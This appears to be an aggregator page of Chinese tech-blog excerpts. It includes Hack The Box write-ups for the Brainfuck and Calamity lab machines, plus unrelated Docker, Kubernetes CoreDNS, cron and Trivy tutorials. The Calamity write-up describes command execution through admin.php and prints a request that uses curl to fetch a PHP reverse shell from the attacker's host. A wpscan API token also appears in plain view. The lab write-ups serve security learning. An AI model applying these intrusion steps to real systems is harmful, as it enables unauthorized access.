Alpine Linux

HTB-靶机-Brainfuck

大憨熊 提交于 2020-12-23 04:00:29
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.17 nmap -sC -sV -p- -T5 -oN brainfuck.nmap 10.10.10.17 nmap扫描结果 扫描结果有开放邮箱,https,还得知一些证书相关的信息,看到有brainfuck.htb和sup3rs3cr3t.brainfuck.htb 直接绑定hosts搞吧 echo " 10.10.10.17 brainfuck.htb " | sudo tee -a /etc/hosts echo "10.10.10.17 sup3rs3cr3t.brainfuck.htb" | sudo tee -a /etc/hosts 访问得到如上信息,发现了一些跟邮件有关的信息,一个邮箱orestis@brainfuck.htb 确认目标是wordpress程序,使用wpscan扫描一把 wpscan --disable-tls-checks --url https://brainfuck.htb -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc 得到一款插件相关的漏洞信息

使用 docker buildx 构建多 cpu 架构镜像

烂漫一生 提交于 2020-12-22 14:57:49
使用 docker buildx 实现多平台编译 docker registry api v2 支持多 CPU 架构镜像. 同时 harbor v2 也实现了 docker registry api v2 的支持. 实现之后, 将不再有 cpu 架构困扰, 一个 docker pull image:tag 将自动适配可适配的平台。真正做到海纳百川,一骑当千。 0x01 准备 docker 开启实验模式 buildx 插件 qemu 模拟器 Linux kernel >= 4.8 linux 系统内核 由于 binfmt_misc 机制开启需要依赖 Linux kernel >= 4.8 。因此,在对 linux 系统操作选型上有一定要求。 建议使用 发行版 出场内核已经满足需求的操作系统。而不是选择自己升级系统内核。 ubuntu:18.04 LTS 及以上 debian:10 及以上 参考文章: build multi architecture docker image with buildx 开启实验模式 当前 buildx 还是一个实验模式, 如需要支持, 需要进行如下配置 开启实验模式。修改 /etc/docker/daemon.json, 增加 experimental 字段, 如下。 # vi /etc/docker/daemon.json {

K8S从入门到放弃系列-(12)Kubernetes集群Coredns部署

江枫思渺然 提交于 2020-12-16 20:11:39
摘要:   集群其他组件全部完成后我们应当部署集群 DNS 使 service 等能够正常解析,1.11版本coredns已经取代kube-dns成为集群默认dns。 1)下载yaml配置清单 [root@k8s-master01 ~]# mkdir /opt/k8s/ coredns [root@k8s -master01 ~]# cd /opt/k8s/coredns/ [root@k8s -master01 coredns]# wget https: // raw.githubusercontent.com/coredns/deployment/master/kubernetes/coredns.yaml.sed [root@k8s-master01 coredns]# mv coredns.yaml. sed coredns.yaml 2)修改默认配置清单文件 [root@k8s-master01 ~]# vim /opt/k8s/coredns/coredns.yaml # 第一处修改 apiVersion: v1 kind: ConfigMap metadata: name: coredns namespace: kube - system data: Corefile: | .: 53 { errors health ready kubernetes cluster

HTB-靶机-Calamity

♀尐吖头ヾ 提交于 2020-12-04 18:31:12
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.27 本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描 执行命令 autorecon 10.10.10.27 -o ./calamity-autorecon 最终的扫描结果 得知开放两个端口,先访问80端口 没发现啥有价值的信息,看下上面程序跑的目录情况 发现200响应码 有最下面几个,访问了,确认admin.php看似是可以利用的 上面试了试admin/admin弱口令并未成功,然后看下burpsuite抓包情况 发现密码,使用此密码以用户admin进行登录 登录成功之后,显示上述信息,根据上述信息的提示可以是使用php进行命令执行,试了试还真可以 那么可以执行命令那么就反弹shell,这里开始使用nc,发现成功反弹之后又被踢出去了,后来拿到权限才知道是因为目标靶机有一个后台程序监听常用反弹shell的关键字导致,所以我这直接使用curl命令下载php反弹shell然后执行成功反弹,下面是反弹shell请求包 GET /admin.php?html=%3C%3Fphp+system%28( ' curl+http://10.10.14.4

终于有人把docker讲清楚了

爱⌒轻易说出口 提交于 2020-11-23 23:58:59
一、简介   1、了解docker的前生LXC      LXC为Linux Container的简写。可以提供轻量级的虚拟化,以便隔离进程和资源,而且不需要提供指令解释机制以及全虚拟化的其他复杂性。相当于C++中的NameSpace。容器有效地将由单个操作系统管理的资源划分到孤立的组中,以更好地在孤立的组之间平衡有冲突的资源使用需求。     与传统虚拟化技术相比,它的优势在于:     (1)与宿主机使用同一个内核,性能损耗小;     (2)不需要指令级模拟;     (3)不需要即时(Just-in-time)编译;     (4)容器可以在CPU核心的本地运行指令,不需要任何专门的解释机制;     (5)避免了准虚拟化和系统调用替换中的复杂性;     (6)轻量级隔离,在隔离的同时还提供共享机制,以实现容器与宿主机的资源共享。     总结:Linux Container是一种轻量级的虚拟化的手段。     Linux Container提供了在单一可控主机节点上支持多个相互隔离的server container同时执行的机制。Linux Container有点像chroot,提供了一个拥有自己进程和网络空间的虚拟环境,但又有别于虚拟机,因为lxc是一种操作系统层次上的资源的虚拟化。   2、LXC与docker什么关系?      docker并不是LXC替代品

[Docker学习记] 手写第一个Docker镜像

て烟熏妆下的殇ゞ 提交于 2020-11-21 01:26:53
# 手写一个Docker最简单的镜像 一般情况下,手写的image都是在某一个基础镜像的基础上构建的。 关键字: FROM ## 先看简单的示例 ``` FROM ubuntu RUN echo "Hello Docker" ``` 在ubuntu这个基础镜像(一般基础镜像是类似操作系统或者运行环境:比如nodejs,可参考阮一峰[示例](http://www.ruanyifeng.com/blog/2018/02/docker-tutorial.html))上,跑一个echo "Hello Docker" 有了ubuntu这个基础镜像,就可以使用ubuntu上的命令,比如: echo 根据Dockerfile编译成你自己的镜像文件image ``` docker build -t hello . ``` build表示编译镜像 -t: 指定镜像名字: hello .: 当前目录,会从当前目录默认找Dockerfile的文件(首字母大写,没有后缀),来构建镜像 查看镜像 ``` docker images ``` 查看镜像 REPOSITORY TAG IMAGE ID CREATED SIZE hello latest d21a34a50ec6 7 hours ago 5.59MB 我的这个hello是FROM alpine --一个很小的linux系统

Docker不再是唯一的选择

泪湿孤枕 提交于 2020-11-20 08:35:35
Docker并不是唯一的容器化工具,可能还有更好的选择…… 在容器的早期时代(其实更像是4年前),Docker是容器游戏中唯一的玩家。但现在情况已经不一样了,Docker不再是唯一的一个,而只是其中一个容器引擎而已。Docker允许我们构建、运行、拉、推或检查容器镜像,然而对于每一项任务,都有其他的替代工具,甚至可能比Docker做得还要好。所以,让我们探索一下,然后再卸载(只是可能),直至完全忘记Docker…… 那,为什么不再用Docker了? 如果你已经使用Docker很长时间了,估计要真正说服你去考虑其他工具,得先提供些依据。 首先,Docker是一个单体工具。它尝试去涵盖所有的功能,通常这并不是最佳实践。大多数情况下,我们都是只选择一种专门的工具,它只做一件事,并且做得非常好,非常精。 如果害怕切换到不同的工具集是因为将不得不学习使用不同的CLI、API或者说不同的概念,那么这不会是一个问题。本文中展示的任何工具都可以是完全无缝的,因为它们(包括Docker)都遵循OCI (Open Container Initiative)下的相同规范。它们包含了容器运行时、容器分发和容器镜像的规范,其中涵盖了使用容器所需的所有特性。 有了OCI,你可以选择一套最符合你需求的工具,同时你仍然可以享受跟Docker一样使用相同的API和CLI命令。 所以,如果你愿意尝试新的工具

docker一键搭建Nginx+PHP环境(含自动部署命令)

删除回忆录丶 提交于 2020-11-18 03:54:59
文章的主要部分是一步一步的教程,文章的最后是我整理好的一键安装命令,自动下载并安装docker,构建镜像,启动容器集群(压缩包内注释覆盖范围达到80%) 大家可以看完教程亲自尝试下,也可以直接执行一键安装命令,整个过程大概10分钟左右,我在四台不同的机器上执行过该命令,由于网络原因,5-15分钟不等。 如本文章内容与通过一键安装下载的不同,以一键安装的为准,一键安装版本会继续更新,v1.3.0版本支持memcache 和 redis。 执行完一键安装后,直接访问 你的IP:8081 访问即可出现phpinfo页面的内容 本次部署,旨在单台服务器上使用docker构建集成环境,并运行Nginx+PHP项目 宿主机系统:CentOS7+ 内存4G 安装docker环境 首先更新yum $ sudo yum update 移除docker旧版本(如果有的话) $ sudo yum remove docker \ docker-client \ docker-client-latest \ docker-common \ docker-latest \ docker-latest-logrotate \ docker-logrotate \ docker-selinux \ docker-engine-selinux \ docker-engine 安装系统依赖 sudo yum

给debian的docker容器添加crontab定时任务

别来无恙 提交于 2020-11-09 01:00:21
现在大部分的docke镜像是基于debian # cat /etc/issue Debian GNU/Linux 9 \n \l Docker容器是不支持后台服务的,像systemctl service crontab这些后台运行的服务是不能通过 RUN systemctl start nginx 类似这种方案实现的,你必须写自己的entrypoint脚本来启动。本文记录了基于Debian的docker容器设置定时任务的方式。 案例背景 我部署一个前端项目,使用nginx镜像,由于官方镜像是基于debian,对比alpine也不觉得体积差多少,于是就使用debian作为容器系统。 Dockerfile看起来是这样的 FROM nginx:1.15.10 MAINTAINER Ryan Miao COPY sources.list /etc/apt/sources.list RUN apt-get update && apt-get install -y net-tools procps curl wget vim telnet cron 、 && apt-get autoremove && apt-get clean && rm -rf /var/lib/apt/lists/* RUN mkdir -p /data/log/nginx && mkdir -p /data/web &

镜像漏洞扫描工具Trivy

眉间皱痕 提交于 2020-11-02 15:26:24
Trivy的特征 Trivy是一种适用于CI的简单而全面的容器漏洞扫描程序。软件漏洞是指软件或操作系统中存在的故障、缺陷或弱点。Trivy检测操作系统包(Alpine、RHEL、CentOS等)和应用程序依赖(Bundler、Composer、npm、yarn等)的漏洞。Trivy很容易使用,只要安装二进制文件,就可以扫描了。扫描只需指定容器的镜像名称。与其他镜像扫描工具相比,例如Clair,Anchore Engine,Quay相比,Trivy在准确性、方便性和对CI的支持等方面都有着明显的优势。 推荐在CI中使用它,在推送到container registry之前,您可以轻松地扫描本地容器镜像,Trivy具备如下的特征: 检测面很全,能检测全面的漏洞,操作系统软件包(Alpine、Red Hat Universal Base Image、Red Hat Enterprise Linux、CentOS、Oracle Linux、Debian、Ubuntu、Amazon Linux、openSUSE Leap、SUSE Enterprise Linux、Photon OS 和Distrioless)、应用程序依赖项(Bundler、Composer、Pipenv、Poetry、npm、yarn和Cargo); 使用简单,仅仅只需要指定镜像名称; 扫描快且无状态